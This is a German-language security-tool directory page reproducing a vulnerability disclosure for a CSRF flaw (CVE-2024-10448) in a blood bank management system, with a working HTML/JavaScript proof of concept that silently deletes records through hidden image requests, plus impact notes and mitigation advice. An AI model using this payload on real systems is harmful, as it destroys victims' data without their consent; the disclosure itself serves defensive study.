Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10448 — Blutbank CSRF-Angriff POC | Kitploit
Tools/GitHubGitHub/bevennyamande/cve-2024-10448
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

Blutbank CSRF-Angriff POC

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Betroffene Version:

  • BloodBank Management System: 1.0

Schwachstelleninformationen:

  • Art der Schwachstelle: Cross Site Request Forgery (CSRF)
  • Schweregrad: HIGH
  • Status: Ungepatcht

Angreifbarer Endpunkt:

  • Pfad: /file/delete.php?bid=

Beschreibung der Schwachstelle:

Eine Cross Site Request Forgery (CSRF)-Sicherheitslücke wurde in der Blutbestellungsfunktion des BloodBank Management Systems entdeckt. Dieser Fehler tritt auf, wenn eine delete-Anfrage an diesen Pfad /file/delete.php?bid= gesendet wird, wodurch der Parameter bid einen zu löschenden Datensatz in der Anwendung auswählen kann. Die sind jedoch dynamisch, abhängig vom Hinzufügen der Blutproben. Um die Anfrage erfolgreich zu machen, habe ich ein mit JavaScript generiertes Bild-Tag in einer Schleife verwendet.

Tool herunterladen
bids

Eine erfolgreiche Ausnutzung kann zu nicht autorisierten Aktionen, d.h. Löschung von Daten, im Namen des Opfers führen. Zusätzlich könnte dies durch den Besuch schädlicher Websites mit der Nutzlast ausgenutzt werden.


Proof of Concept (PoC):

Nachfolgend ein Beispiel eines CSRF-PoC-Angriffs, der die verfügbaren Blutproben über den Parameter bid löscht. Hosten Sie die Datei auf einer vom Angreifer kontrollierten Domain; in meinem Fall habe ich localhost verwendet:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


Video PoC

  • Videolink

Auswirkungen:

  • Datenmanipulation: Angreifer könnten den Benutzern angezeigten Inhalt ändern.
  • Reputationsschaden: Benutzer könnten aufgrund böswilligen Verhaltens das Vertrauen in das System verlieren.

Empfehlungen zur Schadensbegrenzung:

  1. Verwenden Sie CSRF-Token Implementieren Sie einen Mechanismus, um domänenübergreifenden Zugriff zu verhindern, oder fügen Sie csrf-Token in Ihre Anfrage ein und vermeiden Sie, dass GET-Anfragen zustandsändernde Aktionen ausführen.